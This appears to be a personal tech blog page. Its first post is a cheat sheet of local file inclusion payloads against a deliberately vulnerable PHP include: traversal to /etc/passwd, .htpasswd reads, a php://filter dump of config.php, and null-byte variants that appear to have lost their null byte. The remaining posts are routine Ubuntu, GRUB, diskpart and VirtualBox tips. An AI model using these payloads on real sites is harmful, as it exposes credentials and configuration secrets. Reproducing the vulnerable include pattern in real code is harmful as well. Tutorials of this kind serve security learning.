Variations for exploiting the File Inclusion vulnerability

This post lists some of the ways that I've learnt to exploit the file inclusion vulnerability. I'm quite sure that there are much more variations and modifications to exploit file inclusion so if you have any, feel free to comment here.

Before going on this post, you might want to read my previous articles posted here before:
LFI tutorial
RFI tutorial
-> A sample vulnerable piece of code would be something like below: test.php

<?php
include("incs/".$_GET['page']);
?>

-> including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

-> path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

-> Nullbyte injection
test.php?page=../../../../../etc/passwd

-> Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

-> PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

-> Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …

I'll update it more and more when I get to know other variations on exploiting the file inclusion vulnerabilities.

Read more...

Updating|Upgrading ubuntu via terminal

While you might be mostly using the GUI update manager (System-> Administration-> Update Manager), you might also be interested to know how to update your ubuntu from the terminal.

Open your terminal and enter the following two lines of code and you'll be easily updating ubuntu from your terminal.

sudo apt-get update

sudo apt-get upgrade

Isn't that as easy as using the GUI update manager? Hope it helps.

Read more...

Converting dynamic disk to basic with diskpart

For some reason I had to convert my virtual hard disk from dynamic to basic type and Disk management GUI didn't allow me to do so. So here I am going to show you how to accomplish this task with command line option with the diskpart.exe

First delete all the volumes in the disk from the disk management GUI tool(type diskmgmt.msc in run).

You'll have to follow the following steps in order to convert the disk type:
- type diskpart in the command prompt
- to view the available disk, type list disk
- now select your target disk, type select disk n where n = ID of the disk
- finally type convert basic to have your disk converted to the basic type.

Hope it will be useful sometimes.

Read more...

Speeding up softwares installation in ubuntu with apt-fast

By default, we use apt-get to install the applications in the linux but it is not always that good in terms of the speed of download. So apt-fast.sh has come as an open source alternative for this purpose.

The apt-fast script from mattparnell.com is a little shellscript that increases the speed of apt-get by many times. You need to have the axel download accelerator installed, which is a simple, short process, but everything else is extremely straight forward.

So, you'll have to first install the axel download accelerator either from the ubuntu software center or by doing as below:

sudo apt-get install axel

After installing axel, just download the apt-fast shellscript from HERE. After downloading the shellscript, just do the following and you are done.

sudo cp $HOME/Downloads/apt-fast.sh /usr/bin/apt-fast
sudo chmod +x /usr/bin/apt-fast

Now you can use apt-fast from the terminal to install and update the packages installed under your ubuntu installation. Hope this helps to improve your speed. :)

Read more...

Changing the default GRUB2 boot order

In order to change the way GRUB works, you need to edit the GRUB configuration file which is located at /etc/default/grub. Here, I'll post the way to change the default boot order of the GRUB2.

In order to edit the GRUB configuration file, enter the following command in the terminal:

sudo gedit /etc/default/grub

Its content will look like below:

# If you change this file, run 'update-grub' afterwards to update
# /boot/grub/grub.cfg.

GRUB_DEFAULT=0
#GRUB_HIDDEN_TIMEOUT=0
GRUB_HIDDEN_TIMEOUT_QUIET=true
GRUB_TIMEOUT=10
GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
GRUB_CMDLINE_LINUX=""

# Uncomment to disable graphical terminal (grub-pc only)
#GRUB_TERMINAL=console

# The resolution used on graphical terminal
# note that you can use only modes which your graphic card supports via VBE
# you can see them in real GRUB with the command `vbeinfo'
#GRUB_GFXMODE=640x480

# Uncomment if you don't want GRUB to pass "root=UUID=xxx" parameter to Linux
#GRUB_DISABLE_LINUX_UUID=true

# Uncomment to disable generation of recovery mode menu entries
#GRUB_DISABLE_LINUX_RECOVERY="true"

# Uncomment to get a beep at grub start
#GRUB_INIT_TUNE="480 440 1"

You need to change the value of GRUB_DEFAULT=0 parameter in order to change the default boot order of the grub.

0 is the first and default entry so lets say another OS like Windows 7 is in the 5th position of the boot order, you would change the value of GRUB_DEFAULT=0 parameter to 4.

Now with the change in the GRUB, you need to update grub by issuing the following command in terminal:

sudo update-grub

Hope this helps you. :)


Read more...

Password protecting the mounting of NTFS drives in Ubuntu

You might want to password protect the mounting process of the NTFS drives in your ubuntu OS for the purpose of privacy...

Enabling password protection is not hard stuff enough. Just follow the following instructions for this:

- Open the terminal and type:

sudo gedit /var/lib/polkit-1/localauthority/10-vendor.d/com.ubuntu.desktop.pkla

- Just comment by adding # at the beginning of each line in the first four lines or all the lines above the line [Change CPU Frequency scaling] i.e. upto the line ResultActive=yes

- Now save the file and whenever you try to mount the NTFS drives under ubuntu, it will prompt you for the pasword.

Read more...

Accessing shared folders of host system from Backtrack4(virtual)

As the title of the post says, this post will help you to access the shared folders. The example is based on the Backtrack 4 installed as virtual OS with VirtualBox OSE under ubuntu 10.10 but there should not be problem in other systems too as long as the virtual OS is linux-based.

From the VirtualBox menu, Device->Shared Folders, you can add, edit and remove the shared folders that are shared by the host OS with the virtual OS.

Now onto the main problem, just enter the following command in order to successfully access the shared folders from within the BT4.

mount -t vboxsf /mnt

For example, if I share the folder $HOME/Desktop, I would do following in the BT4 konsole.

mount -t vboxsf Desktop /mnt

Note that if the windows system is the host OS, then I think you should include your shared folders as the Transient folder (anyone to make sure of this?) instead of the Machine Folders.
That's all. I hope this helps you.

Read more...

Installing VirtualBox Addition in Backtrack 4 Final

I run ubuntu linux and Win XP and BT4 in the Virtual environment using VirtualBox OSE. There was no problem installing VirtualBox Guest Addition in XP, however, I had problem installing it in Backtrack 4 so I tried few things and finally was successful to solve it. And I thought to share with you as it might help you as well.


Just enter the following commands one after another in the terminal(konsole in BT 4) and you're done.

- mkdir /vboxguest

- mount /dev/hdc /vboxguest

- cd /vboxguest

- ./VBoxLinuxAddition-x86.run

- reboot

After the reboot, you'll see the VirtualBox Guest Addition working properly for your BT4 installation. Hope this helps.


Read more...